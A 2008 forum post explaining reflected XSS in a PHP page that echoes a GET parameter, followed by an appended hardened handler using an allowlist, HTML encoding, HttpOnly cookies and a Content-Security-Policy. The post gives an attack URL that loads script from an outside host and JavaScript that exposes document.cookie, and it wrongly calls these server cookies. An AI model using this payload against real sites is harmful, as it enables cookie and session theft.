
Author Topic: GET VARIABLE URL [XSS]  (Read 964 times)
webmaster
hairulazami
« on: August 16, 2008, 02:36:46 PM »

GET VARIABLE URL [XSS]

This bug is indeed simple, but if it ends up being indexed by Google, it doesn't look good...

For example, suppose there is a variable $pesan in the URL which is then displayed with the echo command in PHP on the web page.

For example:

http://ko-main2.com/landingpage.php?act ... OK_Kterima

Now, if the site has something like this:

Code:
<?php
// Vulnerable: the pesan query parameter is written into the page without output encoding
echo $_GET['pesan'];
?>

then what gets displayed is that pesan variable, of course!!!

So what if I build a PHP injection for it, using the XSS (Cross Site Scripting) method?

For example, I use something like this:

Code:

http://ko-main2.com/landingpage.php?action=submit&pesan=<script src=http://injectdomain.com/gwgigitlu.js></script>


Then gwgigitlu.js contains a JS script like this, for example:

Code:
document.write ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);
alert ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);


Now look at what happens: the cookies on the server become visible...

Happy experimenting!!!
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged
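
The defensive counterpart to the `echo $_GET['pesan']` shown in the post, as an added example that is not part of the original post: the parameter is treated as a lookup key, anything else is HTML-encoded before output, and the session cookie is marked HttpOnly so an injected script cannot read it from `document.cookie`. The names `PESAN_TEXT`, `html_escape` and `render_pesan` and the status values are hypothetical; the array form of `session_set_cookie_params` assumes PHP 7.3 or later.

```php
<?php
// Added example (hypothetical names): hardened handling of the pesan parameter.

// Constructed allowlist: the only status keys this page displays as-is.
const PESAN_TEXT = [
    'OK'     => 'Your submission was accepted.',
    'FAILED' => 'Your submission could not be processed.',
];

/** Encode untrusted text for HTML element content or a quoted attribute value. */
function html_escape(string $value): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Turn the raw query parameter into text that is safe to place inside <p>...</p>. */
function render_pesan($raw): string
{
    if (!is_string($raw)) {
        return '';                      // ?pesan[]=x arrives as an array, not a string
    }
    if (isset(PESAN_TEXT[$raw])) {
        return PESAN_TEXT[$raw];        // known key: fixed, server-side text
    }
    // Unknown value: cap the length and encode, so <script ...> is shown as text.
    return 'Unknown status: ' . html_escape(substr($raw, 0, 64));
}

// HttpOnly keeps the session cookie out of document.cookie.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Second layer: the browser refuses scripts loaded from other origins.
header("Content-Security-Policy: script-src 'self'");
header('Content-Type: text/html; charset=UTF-8');

echo '<p>', render_pesan($_GET['pesan'] ?? ''), '</p>';
```

With this handler, the `<script src=...>` value from the post's URL is rendered as the literal text `&lt;script src=...` and no remote file is loaded.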

